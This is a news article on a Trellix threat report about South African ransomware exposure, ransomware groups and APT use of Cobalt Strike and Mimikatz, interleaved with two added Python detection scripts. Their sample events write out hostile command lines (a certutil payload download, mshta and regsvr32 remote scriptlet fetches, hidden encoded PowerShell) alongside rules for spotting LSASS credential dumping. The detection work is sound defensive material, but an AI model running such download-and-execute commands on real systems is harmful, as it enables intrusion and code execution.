South Africa (SA) is seventh on the list of countries that have suffered the most ransomware attacks, despite having only the 32nd largest gross domestic product in the world.
This is according to Carlo Bolzonello, country manager for Trellix SA, discussing the findings of the company’s Advanced Threat Research Report: January 2022, which examines cyber criminal behaviour and activity related to cyber threats in the third quarter of 2021.
There are several reasons why attackers seem to find SA an attractive target. One of them is the fact that businesses might be coughing up the ransoms being asked of them because they don’t have the time or expertise to address attacks before they damage their operations.
“The other leading reason is linked to that: we’re a soft target because we don’t have enough skills in the country to respond to cyber crime – which is exacerbated by corporates buying multiple point products, and not having the resources they need to integrate them and manage them effectively.”
Raj Samani, chief scientist and fellow at Trellix, says while last year ended with a focus on the pandemic as well as revelations around the Log4j vulnerability, Trellix’s third-quarter deep dive into cyber threat activity found notable new tools and tactics among ransomware groups and advanced global threat actors.
“This report provides greater visibility into the use and abuse of ransomware group personas, how nation state APT actors seek to burrow deeper into finance and other critical industries, and new living-off-the-land attacks exploiting native Microsoft system tools in new ways,” says Samani.
With living-off-the-land attacks, bad actors leverage whatever is already available in the environment, as opposed to bringing a selection of custom tools and malware with them.
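Because the attacker's tooling in a living-off-the-land intrusion is the operating system's own signed binaries, detection has to key on how a native tool is invoked (its arguments and its parent process) rather than on the tool's presence. The following is an added example, not from the article or from Trellix, of that triage logic run over a handful of constructed process-creation records. The rule set covers a few well-known abuse patterns of native Windows utilities (certutil downloads, mshta and regsvr32 fetching remote scriptlets, encoded PowerShell, Office applications spawning shells); the event format and the sample events are constructed for illustration, and the rules are a starting point to tune, not a complete detection catalogue.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    """Minimal process-creation record: the fields Sysmon Event ID 1 and Windows 4688 share."""
    image: str    # full path of the new process
    cmdline: str  # full command line
    parent: str   # full path of the parent process


# Each rule names a native binary, a command-line pattern that is rarely legitimate for it,
# and optionally a parent pattern. Patterns are matched against lowercased basenames/command lines.
RULES = [
    {"name": "certutil download/decode", "image": r"certutil\.exe",
     "cmdline": r"-urlcache|-decode|-encode"},
    {"name": "mshta remote or inline script", "image": r"mshta\.exe",
     "cmdline": r"https?://|javascript:|vbscript:"},
    {"name": "regsvr32 scriptlet (squiblydoo)", "image": r"regsvr32\.exe",
     "cmdline": r"scrobj\.dll|/i:https?://"},
    {"name": "rundll32 inline script", "image": r"rundll32\.exe",
     "cmdline": r"javascript:|vbscript:"},
    {"name": "encoded or downloading PowerShell", "image": r"powershell\.exe|pwsh\.exe",
     "cmdline": r"\s-e(nc|ncodedcommand)?\s|downloadstring|\biex\b|invoke-expression"},
    {"name": "Office app spawning a shell or script host",
     "image": r"(cmd|powershell|pwsh|mshta|wscript|cscript|regsvr32|rundll32)\.exe",
     "parent": r"(winword|excel|powerpnt|outlook)\.exe"},
]


def basename(path: str) -> str:
    """Lowercased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def triage(events):
    """Return (rule name, event) pairs for every rule each event matches, in rule order."""
    hits = []
    for ev in events:
        img, par, cl = basename(ev.image), basename(ev.parent), ev.cmdline.lower()
        for rule in RULES:
            if not re.fullmatch(rule["image"], img):
                continue
            if "cmdline" in rule and not re.search(rule["cmdline"], cl):
                continue
            if "parent" in rule and not re.fullmatch(rule["parent"], par):
                continue
            hits.append((rule["name"], ev))
    return hits


# Constructed sample events (not real telemetry). Two of them use the same binaries legitimately
# to show that the signal is the invocation, not the tool.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\certutil.exe",
                 r"certutil.exe -urlcache -split -f http://203.0.113.10/payload.txt C:\Users\Public\p.txt",
                 r"C:\Windows\System32\cmd.exe"),
    ProcessEvent(r"C:\Windows\System32\mshta.exe",
                 r"mshta.exe http://203.0.113.10/a.hta",
                 r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"),
    ProcessEvent(r"C:\Windows\System32\regsvr32.exe",
                 r"regsvr32.exe /s /n /u /i:http://203.0.113.10/x.sct scrobj.dll",
                 r"C:\Windows\System32\cmd.exe"),
    ProcessEvent(r"C:\Windows\System32\certutil.exe",          # benign: verifying a local certificate
                 r"certutil.exe -verify C:\certs\root.cer",
                 r"C:\Windows\System32\cmd.exe"),
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA",
                 r"C:\Windows\explorer.exe"),
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",  # benign: scheduled script
                 r"powershell.exe -File C:\scripts\backup.ps1",
                 r"C:\Windows\System32\taskeng.exe"),
]


if __name__ == "__main__":
    for name, ev in triage(SAMPLE_EVENTS):
        print(f"[{name}] {basename(ev.parent)} -> {ev.cmdline}")
```

The mshta event fires two rules at once (remote HTA plus Office-spawned script host), which is the kind of stacking a SOC would score higher than a single match; the two benign certutil and PowerShell invocations produce no alert at all.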
Reappearance of ransomware groups
In Q3 2021, Trellix noted the resurgence of the DarkSide ransomware group under the name BlackMatter, even though DarkSide had claimed to shut down.
Reusing much of the modus operandi DarkSide employed in the Colonial Pipeline attack, BlackMatter continued the double-extortion approach: encrypting systems and threatening to publish the victims' stolen data unless the ransom was paid.
The notorious REvil (also known as Sodinokibi) ransomware family still topped the charts in pervasiveness, accounting for nearly half of Trellix's ransomware detections. In addition, the group claimed to have infected more than 1 million systems and demanded $70 million for a universal decryptor in the July 2021 Kaseya incident, the largest publicly known ransom demand to date.
Advanced persistent threat techniques
By correlating indicators of compromise with the tools used to execute attacks, Trellix observed an evolution in the techniques highly skilled APT actors use to slip through the security nets.
Q3 2021 saw adversary-simulation tools such as Cobalt Strike being abused by nation-state actors to gain access to their victims' networks. Cobalt Strike is a commercial red-team tool that ethical hackers use to emulate attack methods and improve incident response; it was detected in over one-third of the APT campaigns tracked. Because the same binary serves legitimate red teams, its presence alone is not a verdict, and defenders look for its behaviour (beacon traffic patterns and default configuration artefacts) rather than for the tool's name.
Mimikatz, a post-exploitation tool that extracts credentials from memory so an attacker who already has a foothold on a device can move further into the network or elevate privileges, was detected in more than 25% of campaigns.
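The credential-theft step Mimikatz is known for (reading LSASS memory) leaves a specific trace: a process opening lsass.exe with PROCESS_VM_READ in its granted access mask, which Sysmon records as Event ID 10 (ProcessAccess). The following is an added example, not from the article or from Trellix, of triaging such events. The pipe-delimited line format, the allowlist of processes that legitimately read LSASS, and the sample events are all constructed for illustration; the access-right constants are the documented Windows values.

```python
from dataclasses import dataclass

# Windows process access rights (documented constants). Mimikatz needs VM_READ to dump credentials.
PROCESS_VM_READ = 0x0010
PROCESS_QUERY_INFORMATION = 0x0400
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000
PROCESS_ALL_ACCESS = 0x1FFFFF

# Constructed allowlist of source processes that legitimately read lsass on a typical host.
# This must be tuned per estate (AV engines, EDR agents); it is an assumption, not a standard.
ALLOWED_SOURCES = {"msmpeng.exe", "csrss.exe", "wininit.exe", "wmiprvse.exe"}


@dataclass(frozen=True)
class ProcessAccessEvent:
    source_image: str
    target_image: str
    granted_access: int
    call_trace: str


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def parse_event(line: str) -> ProcessAccessEvent:
    """Parse one constructed 'Key: Value | Key: Value' line. Sysmon separates call-trace frames
    with a bare '|' (no spaces), so splitting on ' | ' keeps the trace intact."""
    fields = {}
    for part in line.split(" | "):
        key, _, value = part.partition(": ")
        fields[key.strip()] = value.strip()
    return ProcessAccessEvent(
        source_image=fields["SourceImage"],
        target_image=fields["TargetImage"],
        granted_access=int(fields["GrantedAccess"], 16),
        call_trace=fields.get("CallTrace", ""),
    )


def reasons_for(ev: ProcessAccessEvent):
    """Return a list of reasons this event looks like credential dumping (empty if it does not)."""
    if basename(ev.target_image) != "lsass.exe":
        return []
    if not ev.granted_access & PROCESS_VM_READ:
        return []  # query-only access cannot read credential material
    if basename(ev.source_image) in ALLOWED_SOURCES:
        return []
    reasons = [f"PROCESS_VM_READ on lsass from non-allowlisted process (0x{ev.granted_access:X})"]
    # Frames Sysmon cannot attribute to a loaded module appear as UNKNOWN; that is what reflectively
    # loaded or injected tooling looks like, and it raises confidence considerably.
    if "UNKNOWN" in ev.call_trace:
        reasons.append("call trace contains unbacked (UNKNOWN) module")
    return reasons


def triage(lines):
    """Return one finding per suspicious event: {'source', 'access', 'reasons'}."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        reasons = reasons_for(ev)
        if reasons:
            findings.append({"source": ev.source_image, "access": ev.granted_access, "reasons": reasons})
    return findings


# Constructed sample events (not real telemetry).
SAMPLE_LINES = [
    r"SourceImage: C:\Windows\System32\csrss.exe | TargetImage: C:\Windows\System32\lsass.exe"
    r" | GrantedAccess: 0x1FFFFF | CallTrace: C:\Windows\SYSTEM32\ntdll.dll+9d234|C:\Windows\SYSTEM32\csrsrv.dll+8a12",
    r"SourceImage: C:\Users\Public\mimi.exe | TargetImage: C:\Windows\System32\lsass.exe"
    r" | GrantedAccess: 0x1010 | CallTrace: C:\Windows\SYSTEM32\ntdll.dll+9d234|C:\Users\Public\mimi.exe+4f210",
    r"SourceImage: C:\Windows\System32\rundll32.exe | TargetImage: C:\Windows\System32\lsass.exe"
    r" | GrantedAccess: 0x1410 | CallTrace: C:\Windows\SYSTEM32\ntdll.dll+9d234|UNKNOWN(00000000024C1030)",
    r"SourceImage: C:\Program Files\Tool\monitor.exe | TargetImage: C:\Windows\System32\lsass.exe"
    r" | GrantedAccess: 0x1000 | CallTrace: C:\Windows\SYSTEM32\ntdll.dll+9d234",
    r"SourceImage: C:\Windows\System32\taskmgr.exe | TargetImage: C:\Windows\explorer.exe"
    r" | GrantedAccess: 0x1010 | CallTrace: C:\Windows\SYSTEM32\ntdll.dll+9d234",
]


if __name__ == "__main__":
    for f in triage(SAMPLE_LINES):
        print(f"{f['source']} (0x{f['access']:X}): " + "; ".join(f["reasons"]))
```

Two of the five events are flagged: the unsigned binary in a user-writable path and the rundll32 host whose call trace runs through memory no module accounts for. The csrss.exe event is ignored because it is allowlisted despite asking for PROCESS_ALL_ACCESS, which is why the allowlist is the part of this logic an attacker will probe (process-name spoofing and injection into allowlisted processes) and why the unbacked-module check matters as a second signal.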